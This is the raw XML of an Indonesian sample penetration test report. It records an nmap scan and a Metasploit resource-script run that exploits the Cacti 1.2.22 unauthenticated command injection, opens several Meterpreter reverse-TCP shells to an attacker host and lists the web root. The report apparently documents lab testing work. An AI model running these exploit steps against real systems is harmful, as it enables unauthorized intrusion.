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896573"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ugm.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1828800" cy="1896573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Sample Penetration Test Report Example Company</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        Company: Penelitian Damas 2024</w:t>
        <w:br/>
        <w:t xml:space="preserve">        Authors: N.R. Rosyid, Y. M. Saputra, Anni K. Fauziyah, Yoan Navie Ananda</w:t>
        <w:br/>
        <w:t xml:space="preserve">        Date: 23 October 2025</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12,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97 scan initiated Thu Oct 23 06:21:37 2025 as: nmap -sV -Pn --script http-enum -oN nmap_results.txt 127.0.0.1</w:t>
        <w:br/>
        <w:t>Nmap scan report for localhost (127.0.0.1)</w:t>
        <w:br/>
        <w:t>Host is up (0.000039s latency).</w:t>
        <w:br/>
        <w:t>Not shown: 999 closed tcp ports (conn-refused)</w:t>
        <w:br/>
        <w:t>PORT     STATE SERVICE VERSION</w:t>
        <w:br/>
        <w:t>8080/tcp open  http    Apache httpd 2.4.54 ((Debian))</w:t>
        <w:br/>
        <w:t>|_http-server-header: Apache/2.4.54 (Debian)</w:t>
        <w:br/>
        <w:t xml:space="preserve">| http-enum: </w:t>
        <w:br/>
        <w:t>|_  /docs/: Potentially interesting folder</w:t>
        <w:br/>
        <w:br/>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br/>
        <w:t># Nmap done at Thu Oct 23 06:21:45 2025 -- 1 IP address (1 host up) scanned in 7.93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ning result of target 127.0.0.1 </w:t>
        <w:br/>
        <w:br/>
        <w:t>[*] Using configured payload linux/x86/meterpreter/reverse_tcp</w:t>
        <w:br/>
        <w:t>RHOSTS =&gt; 127.0.0.1</w:t>
        <w:br/>
        <w:t>RPORT =&gt; 8080</w:t>
        <w:br/>
        <w:t>TARGETURI =&gt; /cacti</w:t>
        <w:br/>
        <w:t>[*] 127.0.0.1:8080 - The target is not exploitable. Target is not a Cacti application.</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Pada bagian ini, dilakukan beberapa serangan untuk menguji kerentanan yang telah diidentifikasi sebelumnya. Serangan pertama adalah eksploitasi kerentanan Command Injection pada aplikasi Cacti menggunakan Metasploit. Langkah ini dilakukan untuk memanfaatkan celah keamanan yang ditemukan dalam versi 1.2.22 dari Cacti, dengan tujuan memperoleh akses ilegal ke dalam sistem yang rentan.</w:t>
      </w:r>
      <w:r>
        <w:t>Metasploit berhasil mengeksploitasi kerentanan yang ada pada aplikasi Cacti versi 1.2.22 yang dijalankan pada alamat IP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r>
        <w:t>[*] Processing exploitResource.rc for ERB directives.</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; use exploit/linux/http/cacti_unauthenticated_cmd_injection</w:t>
        <w:br/>
        <w:t>[*] Using configured payload linux/x86/meterpreter/reverse_tcp</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; set RHOSTS 10.33.102.225</w:t>
        <w:br/>
        <w:t>RHOSTS =&gt; 10.33.102.225</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; set RPORT 80</w:t>
        <w:br/>
        <w:t>RPORT =&gt; 80</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; set LHOST 10.33.102.151</w:t>
        <w:br/>
        <w:t>LHOST =&gt; 10.33.102.151</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; set TARGETURI /cacti</w:t>
        <w:br/>
        <w:t>TARGETURI =&gt; /cacti</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; set ForceExploit True</w:t>
        <w:br/>
        <w:t>ForceExploit =&gt; true</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; exploit -j</w:t>
        <w:br/>
        <w:t>[*] Exploit running as background job 0.</w:t>
        <w:br/>
        <w:t>[*] Exploit completed, but no session was created.</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; sleep 20</w:t>
        <w:br/>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 10.33.102.151:4444 </w:t>
        <w:br/>
        <w:t>[*] Running automatic check ("set AutoCheck false" to disable)</w:t>
        <w:br/>
        <w:t>[!] The target is not exploitable. Target is not a Cacti application. ForceExploit is enabled, proceeding with exploitation.</w:t>
        <w:br/>
        <w:t>[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations</w:t>
        <w:br/>
        <w:t>[*] Enumerating local_data_id values for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[+] Found exploitable local_data_id 6 for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Command Stager progress - 100.00% done (1118/1118 bytes)</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 2 opened (10.33.102.151:4444 -&gt; 10.33.102.225:50312) at 2025-08-21 07:58:17 +0700</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 1 opened (10.33.102.151:4444 -&gt; 10.33.102.225:50306) at 2025-08-21 07:58:17 +0700</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 3 opened (10.33.102.151:4444 -&gt; 10.33.102.225:50320) at 2025-08-21 07:58:18 +0700</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 4 opened (10.33.102.151:4444 -&gt; 10.33.102.225:50330) at 2025-08-21 07:58:18 +0700</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 6 opened (10.33.102.151:4444 -&gt; 10.33.102.225:50342) at 2025-08-21 07:58:19 +0700</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; sessions -i</w:t>
        <w:br/>
        <w:br/>
        <w:t>Active sessions</w:t>
        <w:br/>
        <w:t>===============</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  Id  Name  Type                   Information            Connection</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --  ----  ----                   -----------            ----------</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1         meterpreter x86/linux  www-data @ 172.23.0.3  10.33.102.151:4444 -&gt; 10.33.102.225:50306 (10.33.102.225)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2         meterpreter x86/linux  www-data @ 172.23.0.3  10.33.102.151:4444 -&gt; 10.33.102.225:50312 (10.33.102.225)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  3         meterpreter x86/linux  www-data @ 172.23.0.3  10.33.102.151:4444 -&gt; 10.33.102.225:50320 (10.33.102.225)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  4         meterpreter x86/linux  www-data @ 172.23.0.3  10.33.102.151:4444 -&gt; 10.33.102.225:50330 (10.33.102.225)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  5         meterpreter x86/linux                         10.33.102.151:4444 -&gt; 10.33.102.225:50332 (10.33.102.225)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  6         meterpreter x86/linux  www-data @ 172.23.0.3  10.33.102.151:4444 -&gt; 10.33.102.225:50342 (10.33.102.225)</w:t>
        <w:br/>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; sessions -c 'ls -la' -i 1</w:t>
        <w:br/>
        <w:t>[*] Running 'ls -la' on meterpreter session 1 (10.33.102.225)</w:t>
        <w:br/>
        <w:t>total 2820</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 31 00:56 .</w:t>
        <w:br/>
        <w:t>drwxrwxrwx 1 www-data www-data   4096 Jul 30 07:05 ..</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 .git</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 .github</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   1577 Jul 30 07:05 .gitignore</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data    577 Jul 30 07:05 .mdl_style.rb</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data     60 Jul 30 07:05 .mdlrc</w:t>
        <w:br/>
        <w:t>-rw------- 1 www-data www-data   1024 Jul 31 00:56 .rnd</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   3795 Jul 30 07:05 .travis.yml</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data 254887 Jul 30 07:05 CHANGELOG</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  15171 Jul 30 07:05 LICENSE</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  11318 Jul 30 07:05 README.md</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   4341 Jul 30 07:05 about.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  63112 Jul 30 07:05 aggregate_graphs.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  18586 Jul 30 07:05 aggregate_items.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  25705 Jul 30 07:05 aggregate_templates.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  14677 Jul 30 07:05 auth_changepassword.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  15221 Jul 30 07:05 auth_login.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  19044 Jul 30 07:05 auth_profile.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  24203 Jul 30 07:05 automation_devices.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  36742 Jul 30 07:05 automation_graph_rules.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  42897 Jul 30 07:05 automation_networks.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  31517 Jul 30 07:05 automation_snmp.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  18773 Jul 30 07:05 automation_templates.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  38723 Jul 30 07:05 automation_tree_rules.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data   2959 Jul 30 07:05 boost_rrdupdate.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 cache</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data 126187 Jul 30 07:05 cacti.sql</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data   8077 Jul 30 07:05 cactid.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  29268 Jul 30 07:05 cdef.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 cli</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   1934 Jul 30 07:05 clog.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   1940 Jul 30 07:05 clog_user.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data  33597 Jul 30 07:05 cmd.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   8843 Jul 30 07:05 cmd_realtime.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  24350 Jul 30 07:05 color.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  24889 Jul 30 07:05 color_templates.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  13259 Jul 30 07:05 color_templates_items.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  34558 Jul 30 07:05 data_debug.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  35500 Jul 30 07:05 data_input.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  49788 Jul 30 07:05 data_queries.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  37433 Jul 30 07:05 data_source_profiles.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  67358 Jul 30 07:05 data_sources.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  47694 Jul 30 07:05 data_templates.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 docs</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 formats</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  14319 Jul 30 07:05 gprint_presets.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  22061 Jul 30 07:05 graph.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   5764 Jul 30 07:05 graph_image.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   9136 Jul 30 07:05 graph_json.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  17525 Jul 30 07:05 graph_realtime.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  41401 Jul 30 07:05 graph_templates.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   9586 Jul 30 07:05 graph_templates_inputs.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  30755 Jul 30 07:05 graph_templates_items.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  32392 Jul 30 07:05 graph_view.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  12466 Jul 30 07:05 graph_xport.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  88406 Jul 30 07:05 graphs.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  26995 Jul 30 07:05 graphs_items.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  35613 Jul 30 07:05 graphs_new.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   3727 Jul 30 07:05 help.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  67581 Jul 30 07:05 host.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  30239 Jul 30 07:05 host_templates.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 images</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:06 include</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   5721 Jul 30 07:05 index.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 install</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 lib</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   3495 Jul 30 07:05 link.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  21889 Jul 30 07:05 links.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 locales</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 31 00:56 log</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   4666 Jul 30 07:05 logout.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  38081 Jul 30 07:05 managers.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 mibs</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   3410 Jul 30 07:05 permission_denied.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 plugins</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  28268 Jul 30 07:05 plugins.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data  35920 Jul 30 07:05 poller.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data  38581 Jul 30 07:05 poller_automation.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data  35791 Jul 30 07:05 poller_boost.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data   7095 Jul 30 07:05 poller_commands.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data  11602 Jul 30 07:05 poller_dsstats.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data  20170 Jul 30 07:05 poller_maintenance.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data   9881 Jul 30 07:05 poller_realtime.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data   8830 Jul 30 07:05 poller_recovery.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data   5722 Jul 30 07:05 poller_reports.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data   8273 Jul 30 07:05 poller_spikekill.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  39278 Jul 30 07:05 pollers.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  14552 Jul 30 07:05 remote_agent.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   5309 Jul 30 07:05 reports_admin.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   5210 Jul 30 07:05 reports_user.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 resource</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 rra</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  20183 Jul 30 07:05 rrdcleaner.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  11907 Jul 30 07:05 script_server.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 31 00:55 scripts</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 service</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   1728 Jul 30 07:05 service_check.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  43453 Jul 30 07:05 settings.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  20567 Jul 30 07:05 sites.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   2414 Jul 30 07:05 snmpagent_mibcache.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   3688 Jul 30 07:05 snmpagent_mibcachechild.php</w:t>
        <w:br/>
        <w:t>-rwxr-xr-x 1 www-data www-data   5510 Jul 30 07:05 snmpagent_persist.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   3987 Jul 30 07:05 spikekill.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   6597 Jul 30 07:05 templates_export.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data   6263 Jul 30 07:05 templates_import.php</w:t>
        <w:br/>
        <w:t>drwxr-xr-x 1 www-data www-data   4096 Jul 30 07:05 tests</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  64922 Jul 30 07:05 tree.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  99936 Jul 30 07:05 user_admin.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  29909 Jul 30 07:05 user_domains.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  89318 Jul 30 07:05 user_group_admin.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data 104198 Jul 30 07:05 utilities.php</w:t>
        <w:br/>
        <w:t>-rw-r--r-- 1 www-data www-data  28883 Jul 30 07:05 vdef.php</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; sleep 10</w:t>
        <w:br/>
        <w:t>resource (exploitResource.rc)&gt; exit</w:t>
        <w:br/>
        <w:t>[*] You have active sessions open, to exit anyway type "exit -y"</w:t>
        <w:br/>
        <w:t>resource (exploit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